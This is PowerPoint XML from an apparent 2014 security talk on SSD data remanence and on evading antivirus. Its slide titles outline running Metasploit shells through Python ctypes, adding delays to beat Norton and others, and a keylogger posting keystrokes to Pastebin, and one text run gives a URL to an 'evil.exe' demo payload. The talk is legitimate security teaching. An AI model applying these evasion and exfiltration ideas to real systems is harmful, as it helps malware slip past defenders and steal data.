            <a:ext cx="8229600" cy="933274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samsclass.info/evil.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2014-05-24 at 12.24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911" y="1120422"/>
            <a:ext cx="5537200" cy="368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238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4-05-24 at 12.28.4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556" y="633561"/>
            <a:ext cx="6152444" cy="602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015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UNSTOPPABLE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None of these products stop it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Norton</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>McAfee</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kaspersky</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Nod32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>F-Secure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Avast!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Microsoft Security Essentials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5718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Norton Failing 7-8-14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norton-v-evil-0708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94" y="1600200"/>
            <a:ext cx="7767806" cy="514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0094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drivesavers_logo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0" y="368300"/>
            <a:ext cx="2844800" cy="2844800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Screen Shot 2013-05-23 at 2.26.3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3549650"/>
            <a:ext cx="7708900" cy="3035300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1329009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lastline-v-evil-s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37" y="685801"/>
            <a:ext cx="8730903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68605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4-07-10 at 6.17.4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198" y="1035431"/>
            <a:ext cx="6057900" cy="49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15448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4-07-10 at 6.17.4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0" y="1046163"/>
            <a:ext cx="82931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23311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4-07-10 at 6.17.5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769" y="1600200"/>
            <a:ext cx="6540500" cy="407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23735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Plaintext Logins at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Wisc.edu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72274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4-07-10 at 8.27.0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364" y="274638"/>
            <a:ext cx="5554734" cy="6539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54024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4-07-10 at 8.22.4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44" y="274638"/>
            <a:ext cx="4940300" cy="6184900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2014-07-10 at 8.23.0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400" y="2305149"/>
            <a:ext cx="5435600" cy="28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48925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4-07-10 at 8.24.1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27" y="908329"/>
            <a:ext cx="8686800" cy="4604611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96217551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Screen Shot 2014-07-10 at 8.25.0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80585"/>
            <a:ext cx="8481366" cy="4714536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35093169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SSDs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0504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902</TotalTime>
  <Words>1048</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>202</Paragraphs>
  <Slides>88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89" baseType="lpstr">
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>SSD Data Evaporation and DoS ALSO Plaintext Logins at Wisc.edu</vt:lpstr>
      <vt:lpstr>Bio</vt:lpstr>
      <vt:lpstr>Data Remanence</vt:lpstr>
      <vt:lpstr>Deleted Data</vt:lpstr>
      <vt:lpstr>DEMO on Windows</vt:lpstr>
      <vt:lpstr>Forensics &amp; Data Recovery</vt:lpstr>
      <vt:lpstr>Useful Free Data Recovery Tools</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>SSDs</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>How SSDs Work</vt:lpstr>
      <vt:lpstr>Garbage Collection</vt:lpstr>
      <vt:lpstr>Demo on Mac: Disk Drill</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Demo on PC</vt:lpstr>
      <vt:lpstr>When Does TRIM Work?</vt:lpstr>
      <vt:lpstr>When Does TRIM Work?</vt:lpstr>
      <vt:lpstr>Expert Witness Testimony</vt:lpstr>
      <vt:lpstr>Experience</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>The evap Tool</vt:lpstr>
      <vt:lpstr>Intro</vt:lpstr>
      <vt:lpstr>Evaporation on JHFS+</vt:lpstr>
      <vt:lpstr>No Evaporation on HFS+</vt:lpstr>
      <vt:lpstr>Antivirus  Ungh!  Good God y'all...  What is it GOOD For?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Mikko Hypponen Video</vt:lpstr>
      <vt:lpstr>Metasploit Payloads</vt:lpstr>
      <vt:lpstr>Metasploit</vt:lpstr>
      <vt:lpstr>Simple Reverse Shell</vt:lpstr>
      <vt:lpstr>Antivirus Catches It</vt:lpstr>
      <vt:lpstr>Norton v. Shell.exe</vt:lpstr>
      <vt:lpstr>Norton Identifies the Metasploit Packer</vt:lpstr>
      <vt:lpstr>VirusTotal: 37/49 Detections</vt:lpstr>
      <vt:lpstr>How to Become 007</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Python v. AV Round 1 shell_bind_tcp</vt:lpstr>
      <vt:lpstr>Export Metasploit Payloads to C</vt:lpstr>
      <vt:lpstr>Use Ctypes Python Library</vt:lpstr>
      <vt:lpstr>Compile it on Windows</vt:lpstr>
      <vt:lpstr>DEMO</vt:lpstr>
      <vt:lpstr>DEMO</vt:lpstr>
      <vt:lpstr>VirusTotal: 1/50 Detection</vt:lpstr>
      <vt:lpstr>Norton Support</vt:lpstr>
      <vt:lpstr>Norton Wins!</vt:lpstr>
      <vt:lpstr>Kaspersky Wins!</vt:lpstr>
      <vt:lpstr>Python v. AV Round 2 shell_bind_tcp with a delay</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>DEMO</vt:lpstr>
      <vt:lpstr>Norton, Avast, &amp; MSE Lose!</vt:lpstr>
      <vt:lpstr>Kaspersky Wins!</vt:lpstr>
      <vt:lpstr>Python v. AV Round 3 shell_bind_tcp in two stages no delay</vt:lpstr>
      <vt:lpstr>Other AV</vt:lpstr>
      <vt:lpstr>Remember Mikko?</vt:lpstr>
      <vt:lpstr>F-Secure Wins!</vt:lpstr>
      <vt:lpstr>AV Challenge</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Python v. AV Round 4 shell_bind_tcp with a delay</vt:lpstr>
      <vt:lpstr>INSTRUCTIONS</vt:lpstr>
      <vt:lpstr>INSTRUCTIONS</vt:lpstr>
      <vt:lpstr>Norton Loses</vt:lpstr>
      <vt:lpstr>Kaspersky Wins</vt:lpstr>
      <vt:lpstr>Advanced Malware Protection</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Python Keylogger</vt:lpstr>
      <vt:lpstr>Google "Python Keylogger"</vt:lpstr>
      <vt:lpstr>Post Keystrokes to Pastebin</vt:lpstr>
      <vt:lpstr>Problem</vt:lpstr>
      <vt:lpstr>Kaspersky &amp; Avast! LOSE</vt:lpstr>
      <vt:lpstr>Norton WINS!</vt:lpstr>
      <vt:lpstr>But just add a delay...</vt:lpstr>
      <vt:lpstr>F-Secure LOSES!</vt:lpstr>
      <vt:lpstr>PRODUCT ANNOUNCEMENT!</vt:lpstr>
      <vt:lpstr>Ultra-Advanced APT Tool</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>UNSTOPPABLE</vt:lpstr>
      <vt:lpstr>Norton Failing 7-8-14</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Plaintext Logins at Wisc.edu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Analysis of Stolen Data Dumped by TEAMGHOSTSHELL on Aug 25, 2012  </dc:title>
  <dc:creator>Sam Bowne</dc:creator>
  <cp:lastModifiedBy>Sam Bowne</cp:lastModifiedBy>
  <cp:revision>69</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-08-27T22:23:07Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-07-10T13:28:11Z</dcterms:modified>
</cp:coreProperties>
</file>